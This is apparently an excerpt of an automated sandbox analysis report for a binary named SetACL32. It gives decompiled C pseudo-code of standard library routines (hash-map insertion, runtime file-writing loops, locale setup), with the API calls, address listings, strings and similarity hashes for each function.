						__eflags = _t71;
						if(_t71 != 0) {
							_push(0x3c);
							return E012CAE27(_t71);
						}
						return _t71;
					} else {
						_t10 = _t117 + 4; // 0x4
						_v24 = _t10;
						_v8 = 0;
						_push(0x3c);
						_v20 = 0;
						_t126 = E012CAE5D(_t95, _t117, __esi, __eflags);
						_t138 = _t136 + 4;
						_v20 = _t126;
						_t15 = _t126 + 8; // 0x8
						E012C7820(_t15, _t95);
						 *(_t126 + 0xc) = 0;
						 *(_t126 + 0x1c) = 0;
						 *((intOrPtr*)(_t126 + 0x20)) = 7;
						 *(_t126 + 0x24) = 0;
						 *(_t126 + 0x34) = 0;
						 *((intOrPtr*)(_t126 + 0x38)) = 7;
						_v8 = 1;
						_t105 =  *((intOrPtr*)(_t117 + 8));
						_t96 =  *(_t117 + 0x1c);
						asm("movss xmm3, [edi]");
						asm("movd xmm0, eax");
						asm("cvtdq2pd xmm0, xmm0");
						asm("addsd xmm0, [eax*8+0x1300540]");
						__eflags = _t96 >> 0x1f;
						asm("cvtpd2ps xmm2, xmm0");
						asm("movd xmm0, ebx");
						asm("cvtdq2pd xmm0, xmm0");
						asm("movaps xmm1, xmm2");
						asm("addsd xmm0, [eax*8+0x1300540]");
						asm("cvtpd2ps xmm0, xmm0");
						asm("divss xmm1, xmm0");
						asm("comiss xmm1, xmm3");
						if(_t96 >> 0x1f <= 0) {
							_t115 = _v36;
						} else {
							asm("divss xmm2, xmm3");
							asm("cvtps2pd xmm0, xmm2");
							asm("movsd [ebp-0x20], xmm0");
							_t145 = _v36;
							 *((long long*)(_t138 - 8)) = _t145;
							_t87 = E012E5650(_t105);
							_v36 = _t145;
							asm("movsd xmm0, [ebp-0x20]");
							asm("cvtpd2ps xmm0, xmm0");
							_t88 = E012E76E0(_t87);
							__eflags = _t88 - 8;
							_t110 =  >  ? _t88 : 8;
							__eflags = _t96 - 8;
							if(_t96 < 8) {
								__eflags = _t96 - 0x200;
								if(_t96 >= 0x200) {
									L7:
									_t96 = _t110;
								} else {
									_t96 = _t96 << 3;
									__eflags = _t96 - 8;
									if(_t96 < 8) {
										goto L7;
									}
								}
							}
							_push(_t96);
							E012C99B0(_t117);
							_t29 = _t126 + 8; // 0x8
							_t92 = E012C9B70(_t117,  &_v36, _t29, _a8);
							_t105 =  *((intOrPtr*)(_t117 + 8));
							_t115 =  *_t92;
						}
						_t97 =  *((intOrPtr*)(_t115 + 4));
						 *((intOrPtr*)(_t117 + 8)) = _t105 + 1;
						 *_t126 = _t115;
						 *((intOrPtr*)(_t126 + 4)) = _t97;
						 *_t97 = _t126;
						 *((intOrPtr*)(_t115 + 4)) = _t126;
						_t85 =  *(_t117 + 0x18) & _a8;
						_t106 =  *((intOrPtr*)(_t117 + 0xc));
						_t120 =  *(_t106 + _t85 * 8);
						__eflags = _t120 -  *_v24;
						_t128 = _v20;
						if(_t120 !=  *_v24) {
							__eflags = _t120 - _t115;
							if(_t120 != _t115) {
								__eflags =  *(_t106 + 4 + _t85 * 8) - _t97;
								if( *(_t106 + 4 + _t85 * 8) == _t97) {
									goto L15;
								}
							} else {
								 *(_t106 + _t85 * 8) = _t128;
							}
						} else {
							 *(_t106 + _t85 * 8) = _t128;
							L15:
							 *(_t106 + 4 + _t85 * 8) = _t128;
						}
						_t86 = _a4;
						 *_t86 = _t128;
						_t86[1] = 1;
						 *[fs:0x0] = _v16;
						return _t86;
					}
				} else {
					_t93 = _a4;
					 *_t93 = _t102;
					_t93[1] = 0;
					 *[fs:0x0] = _v16;
					return _t93;
				}
			}



































              0x012c9753
              0x012c9755
              0x012c9760
              0x012c9761
              0x012c9764
              0x012c9765
              0x012c9766
              0x012c9767
              0x012c976e
              0x012c9772
              0x012c9778
              0x012c977a
              0x012c9784
              0x012c978e
              0x012c9793
              0x012c9798
              0x012c97b7
              0x012c97be
              0x012c993b
              0x012c9940
              0x012c9945
              0x012c9946
              0x012c9947
              0x012c9948
              0x012c9949
              0x012c994a
              0x012c994b
              0x012c994c
              0x012c994d
              0x012c994e
              0x012c994f
              0x012c9950
              0x012c9951
              0x012c9952
              0x012c9954
              0x012c9957
              0x012c9959
              0x012c995e
              0x012c9963
              0x012c9966
              0x012c9968
              0x012c996b
              0x012c9970
              0x012c9973
              0x012c9973
              0x012c9968
              0x012c997a
              0x012c997f
              0x012c9981
              0x012c9983
              0x00000000
              0x012c998b
              0x012c998e
              0x012c97c4
              0x012c97c4
              0x012c97c7
              0x012c97ca
              0x012c97d1
              0x012c97d3
              0x012c97df
              0x012c97e1
              0x012c97e4
              0x012c97e8
              0x012c97eb
              0x012c97f0
              0x012c97f7
              0x012c97fe
              0x012c9805
              0x012c980c
              0x012c9813
              0x012c981a
              0x012c9821
              0x012c9824
              0x012c9827
              0x012c982e
              0x012c9832
              0x012c9839
              0x012c9844
              0x012c9847
              0x012c984b
              0x012c984f
              0x012c9853
              0x012c9856
              0x012c985f
              0x012c9863
              0x012c9867
              0x012c986a
              0x012c98da
              0x012c986c
              0x012c986c
              0x012c9873
              0x012c9876
              0x012c987b
              0x012c987e
              0x012c9881
              0x012c9886
              0x012c9889
              0x012c9891
              0x012c9895
              0x012c989f
              0x012c98a1
              0x012c98a4
              0x012c98a6
              0x012c98a8
              0x012c98ae
              0x012c98b7
              0x012c98b7
              0x012c98b0
              0x012c98b0
              0x012c98b3
              0x012c98b5
              0x00000000
              0x00000000
              0x012c98b5
              0x012c98ae
              0x012c98b9
              0x012c98bc
              0x012c98c4
              0x012c98ce
              0x012c98d3
              0x012c98d6
              0x012c98d6
              0x012c98dd
              0x012c98e3
              0x012c98e6
              0x012c98e8
              0x012c98eb
              0x012c98ed
              0x012c98f3
              0x012c98f6
              0x012c98fc
              0x012c98ff
              0x012c9901
              0x012c9904
              0x012c990b
              0x012c990d
              0x012c9914
              0x012c9918
              0x00000000
              0x00000000
              0x012c990f
              0x012c990f
              0x012c990f
              0x012c9906
              0x012c9906
              0x012c991a
              0x012c991a
              0x012c991a
              0x012c991e
              0x012c9921
              0x012c9923
              0x012c992a
              0x012c9938
              0x012c9938
              0x012c979a
              0x012c979a
              0x012c979d
              0x012c979f
              0x012c97a6
              0x012c97b4
              0x012c97b4

              APIs
                • Part of subcall function 012C8BB0: IsValidSid.ADVAPI32(012C9605,00000000,00000000,00000000,00000000,00000000,000000FF,?,012C9605,00000000,?,?), ref: 012C8BC8
                • Part of subcall function 012C8BB0: GetLengthSid.ADVAPI32(00000000,012C9605,?,012C9605,00000000,?,?), ref: 012C8BD9
              • __floor_pentium4.LIBCMT ref: 012C9881
              Strings
              • unordered_map/set too long, xrefs: 012C993B
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: LengthValid__floor_pentium4
              • String ID: unordered_map/set too long
              • API String ID: 1178462270-306623848
              • Opcode ID: ccca721cc45525fae26ce0dff86c3ef7073eb11dc7ed78c00083ee80562d3c20
              • Instruction ID: 302f810f33a91984a56778171f85caeb4ccbaab3d62368a751aeadf2ed7ab4d0
              • Opcode Fuzzy Hash: ccca721cc45525fae26ce0dff86c3ef7073eb11dc7ed78c00083ee80562d3c20
              • Instruction Fuzzy Hash: 8561057191060ADFDB11DF29C480BAAF7B8FF58718F14872EE90AA7640E735A490CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012E15A8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E012E15A8(intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				char _v1716;
				char _v5132;
				intOrPtr _v5136;
				void* _v5140;
				long _v5144;
				intOrPtr _v5148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int* _t39;
				intOrPtr _t43;
				void* _t51;
				intOrPtr _t56;
				signed int _t61;
				signed short* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				signed int _t69;
				void* _t70;

				E012CBE70(0x1418);
				_t30 =  *0x1309018; // 0xedd8d3b4
				_v8 = _t30 ^ _t69;
				_t64 = _a12;
				_t67 = _a4;
				_v5140 =  *((intOrPtr*)( *((intOrPtr*)(0x130b340 + (_a8 >> 6) * 4)) + 0x18 + (_a8 & 0x0000003f) * 0x38));
				_t56 = _a16 + _t64;
				_v5136 = _t56;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t66 = _t64;
				if(_t64 < _t56) {
					do {
						_t68 = _v5136;
						_t39 =  &_v1716;
						while(_t66 < _t68) {
							_t61 =  *_t66 & 0x0000ffff;
							_t66 =  &(_t66[1]);
							if(_t61 == 0xa) {
								_t64 = 0xd;
								 *_t39 = _t64;
								_t39 =  &(_t39[0]);
							}
							 *_t39 = _t61;
							_t39 =  &(_t39[0]);
							if(_t39 <  &_v12) {
								continue;
							}
							break;
						}
						_t43 = E012DF2D2(0xfde9, 0,  &_v1716, _t39 -  &_v1716 >> 1,  &_v5132, 0xd55, 0, 0);
						_t67 = _a4;
						_t70 = _t70 + 0x20;
						_v5148 = _t43;
						if(_t43 == 0) {
							L12:
							 *_t67 = GetLastError();
						} else {
							_t51 = 0;
							if(_t43 == 0) {
								goto L10;
							} else {
								while(WriteFile(_v5140,  &_v5132 + _t51, _t43 - _t51,  &_v5144, 0) != 0) {
									_t51 = _t51 + _v5144;
									_t43 = _v5148;
									if(_t51 < _t43) {
										continue;
									} else {
										goto L10;
									}
									goto L13;
								}
								goto L12;
							}
						}
						goto L13;
						L10:
						 *((intOrPtr*)(_t67 + 4)) = _t66 - _a12;
					} while (_t66 < _v5136);
				}
				L13:
				return E012CAE19(_t67, _t51, _v8 ^ _t69, _t64, _t66, _t67);
			}


























              0x012e15b2
              0x012e15b7
              0x012e15be
              0x012e15c6
              0x012e15db
              0x012e15e8
              0x012e15ee
              0x012e15f2
              0x012e15f8
              0x012e15f9
              0x012e15fa
              0x012e15fb
              0x012e15ff
              0x012e1605
              0x012e1605
              0x012e160b
              0x012e1611
              0x012e1615
              0x012e1618
              0x012e161e
              0x012e1622
              0x012e1623
              0x012e1626
              0x012e1626
              0x012e1629
              0x012e162c
              0x012e1634
              0x00000000
              0x00000000
              0x00000000
              0x012e1634
              0x012e165b
              0x012e1660
              0x012e1663
              0x012e1666
              0x012e166e
              0x012e16c1
              0x012e16c7
              0x012e1670
              0x012e1670
              0x012e1674
              0x00000000
              0x012e1676
              0x012e1676
              0x012e169b
              0x012e16a1
              0x012e16a9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012e16a9
              0x00000000
              0x012e1676
              0x012e1674
              0x00000000
              0x012e16ab
              0x012e16b0
              0x012e16b3
              0x012e16bf
              0x012e16c9
              0x012e16d9

              APIs
              • WriteFile.KERNEL32(?,?,00000000,?,00000000,012E18F1,?,00000000,00000000,?,00000010,00000000,00000000,?,?,00000008), ref: 012E1691
              • GetLastError.KERNEL32(012E18F1,?,00000000,00000000,?,00000010,00000000,00000000,?,?,00000008,?,?,?,?,00000004), ref: 012E16C1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID: @Mhv
              • API String ID: 442123175-3595611156
              • Opcode ID: b9309d2c2be3fa2d7bd0fa387ff41f69b62c25eea5b747722014885d7f17f6a3
              • Instruction ID: dea1ae6621cbafe1b38cd93723776477474a4e3596d6e7baae5cb8ed82ff3e7f
              • Opcode Fuzzy Hash: b9309d2c2be3fa2d7bd0fa387ff41f69b62c25eea5b747722014885d7f17f6a3
              • Instruction Fuzzy Hash: 6B319271B1021AAFDB28CF68DC85AE977F9EF44300F5844B9EA06D7290D670ED908F60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012E14BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMON
              Download Yara Rule
              C-Code - Quality: 81%
              			E012E14BF(intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v10;
				void _v5128;
				void* _v5132;
				long _v5136;
				intOrPtr _v5140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				long _t43;
				signed int _t44;
				intOrPtr* _t46;
				signed short* _t50;
				intOrPtr _t54;
				signed int _t56;
				long _t57;
				signed int* _t58;
				signed int _t60;

				E012CBE70(0x1410);
				_t29 =  *0x1309018; // 0xedd8d3b4
				_v8 = _t29 ^ _t60;
				_t47 = _a8;
				_t46 = _a4;
				_t55 = _t46;
				_t50 = _a12;
				_t54 = _a16 + _t50;
				_v5132 =  *((intOrPtr*)( *((intOrPtr*)(0x130b340 + (_a8 >> 6) * 4)) + 0x18 + (_t47 & 0x0000003f) * 0x38));
				asm("stosd");
				_v5140 = _t54;
				asm("stosd");
				asm("stosd");
				while(_t50 < _t54) {
					_t58 =  &_v5128;
					while(_t50 < _t54) {
						_t44 =  *_t50 & 0x0000ffff;
						_t50 =  &(_t50[1]);
						if(_t44 == 0xa) {
							 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t46 + 8)) + 2;
							_t56 = 0xd;
							 *_t58 = _t56;
							_t58 =  &(_t58[0]);
						}
						 *_t58 = _t44;
						_t58 =  &(_t58[0]);
						if(_t58 <  &_v10) {
							continue;
						}
						break;
					}
					_t55 = _v5132;
					_a12 = _t50;
					_t57 = _t58 -  &_v5128 & 0xfffffffe;
					if(WriteFile(_v5132,  &_v5128, _t57,  &_v5136, 0) == 0) {
						 *_t46 = GetLastError();
					} else {
						_t43 = _v5136;
						 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t46 + 4)) + _t43;
						if(_t43 >= _t57) {
							_t50 = _a12;
							_t54 = _v5140;
							continue;
						}
					}
					L12:
					return E012CAE19(_t46, _t46, _v8 ^ _t60, _t54, _t55, _t57);
				}
				goto L12;
			}






















              0x012e14c9
              0x012e14ce
              0x012e14d5
              0x012e14d8
              0x012e14ea
              0x012e14f6
              0x012e14fc
              0x012e14ff
              0x012e1501
              0x012e1509
              0x012e150a
              0x012e1510
              0x012e1511
              0x012e1589
              0x012e1514
              0x012e151a
              0x012e151e
              0x012e1521
              0x012e1527
              0x012e1529
              0x012e152f
              0x012e1530
              0x012e1533
              0x012e1533
              0x012e1536
              0x012e1539
              0x012e1541
              0x00000000
              0x00000000
              0x00000000
              0x012e1541
              0x012e1543
              0x012e1551
              0x012e155c
              0x012e1571
              0x012e1595
              0x012e1573
              0x012e1573
              0x012e1579
              0x012e157e
              0x012e1580
              0x012e1583
              0x00000000
              0x012e1583
              0x012e157e
              0x012e1597
              0x012e15a7
              0x012e15a7
              0x00000000

              APIs
              • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,012E18E1,?,00000000,00000000,?,00000010,00000000), ref: 012E1569
              • GetLastError.KERNEL32(?,012E18E1,?,00000000,00000000,?,00000010,00000000,00000000,?,?,00000008,?,?,?,?), ref: 012E158F
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID: @Mhv
              • API String ID: 442123175-3595611156
              • Opcode ID: 8004ac1ef8510e4c4d3b14e1c0a8173770d4da1e3593ae7e01ea175a7f63b028
              • Instruction ID: b447e5d6f2f1422ac13b7d02cd440dd634ace0415de157e8fdd70f1fb9dc727a
              • Opcode Fuzzy Hash: 8004ac1ef8510e4c4d3b14e1c0a8173770d4da1e3593ae7e01ea175a7f63b028
              • Instruction Fuzzy Hash: 6C219131A102199BCB25CF18DC859E9B7F9EF48314B5844BAEA0ADB250D730DE91CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012E13E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON
              Download Yara Rule
              C-Code - Quality: 81%
              			E012E13E4(void* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				void _v5128;
				long _v5132;
				intOrPtr _v5136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				long _t43;
				char _t44;
				void* _t46;
				intOrPtr* _t50;
				intOrPtr _t54;
				void* _t55;
				long _t56;
				char* _t57;
				signed int _t58;

				E012CBE70(0x140c);
				_t29 =  *0x1309018; // 0xedd8d3b4
				_v8 = _t29 ^ _t58;
				_t47 = _a8;
				_t46 = _a4;
				_t55 = _t46;
				_t50 = _a12;
				_t54 = _a16 + _t50;
				_v5132 =  *((intOrPtr*)( *((intOrPtr*)(0x130b340 + (_a8 >> 6) * 4)) + 0x18 + (_t47 & 0x0000003f) * 0x38));
				asm("stosd");
				_v5136 = _t54;
				asm("stosd");
				asm("stosd");
				if(_t50 < _t54) {
					_t55 = _v5132;
					do {
						_t57 =  &_v5128;
						while(_t50 < _t54) {
							_t44 =  *_t50;
							_t50 = _t50 + 1;
							if(_t44 == 0xa) {
								 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t46 + 8)) + 1;
								 *_t57 = 0xd;
								_t57 = _t57 + 1;
							}
							 *_t57 = _t44;
							_t57 = _t57 + 1;
							if(_t57 <  &_v9) {
								continue;
							}
							break;
						}
						_a12 = _t50;
						_t56 = _t57 -  &_v5128;
						if(WriteFile(_t55,  &_v5128, _t56,  &_v5132, 0) == 0) {
							 *_t46 = GetLastError();
						} else {
							_t43 = _v5132;
							 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t46 + 4)) + _t43;
							if(_t43 >= _t56) {
								goto L9;
							}
						}
						goto L12;
						L9:
						_t50 = _a12;
						_t54 = _v5136;
					} while (_t50 < _t54);
				}
				L12:
				return E012CAE19(_t46, _t46, _v8 ^ _t58, _t54, _t55, _t56);
			}





















              0x012e13ee
              0x012e13f3
              0x012e13fa
              0x012e13fd
              0x012e140f
              0x012e141b
              0x012e1421
              0x012e1424
              0x012e1426
              0x012e142e
              0x012e142f
              0x012e1435
              0x012e1436
              0x012e1439
              0x012e143b
              0x012e1441
              0x012e1441
              0x012e1447
              0x012e144b
              0x012e144d
              0x012e1450
              0x012e1452
              0x012e1455
              0x012e1458
              0x012e1458
              0x012e1459
              0x012e145b
              0x012e1461
              0x00000000
              0x00000000
              0x00000000
              0x012e1461
              0x012e1469
              0x012e146c
              0x012e1488
              0x012e14ac
              0x012e148a
              0x012e148a
              0x012e1490
              0x012e1495
              0x00000000
              0x00000000
              0x012e1495
              0x00000000
              0x012e1497
              0x012e1497
              0x012e149a
              0x012e14a0
              0x012e14a4
              0x012e14ae
              0x012e14be

              APIs
              • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,012E1901,?,00000000,00000000,?,00000010,00000000), ref: 012E1480
              • GetLastError.KERNEL32(?,012E1901,?,00000000,00000000,?,00000010,00000000,00000000,?,?,00000008,?,?,?,?), ref: 012E14A6
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID: @Mhv
              • API String ID: 442123175-3595611156
              • Opcode ID: 8ab8efb9db7f5ebc8e5e94189cd0dfcb9854c22321fd8f7fe24b05a11dbb8854
              • Instruction ID: d323c7b9e36e53c1d198535948947f854cd230d39bf8c9dd4e18063450197a98
              • Opcode Fuzzy Hash: 8ab8efb9db7f5ebc8e5e94189cd0dfcb9854c22321fd8f7fe24b05a11dbb8854
              • Instruction Fuzzy Hash: 7E219134A102199BCF2ACF29D8849E9B7F9EB48315F5440B9EA06D7355E630DE46CF60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012A1550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
              Download Yara Rule
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 012A157B
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 012A15CA
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
              • String ID: bad locale name
              • API String ID: 3988782225-1405518554
              • Opcode ID: d296498a55d4635c856fef7d37e179a85644da63820e4effe1e1fbfd30105889
              • Instruction ID: c483330e5f615aa4768874526d1f414832186e83ddcf5130ac068f732b3c8a14
              • Opcode Fuzzy Hash: d296498a55d4635c856fef7d37e179a85644da63820e4effe1e1fbfd30105889
              • Instruction Fuzzy Hash: A411B1B19147449FD730CF69D800757BBE8EF18710F044A2EE889C7B40E7B5A504CBA5
              Uniqueness

              Uniqueness Score: -1.00%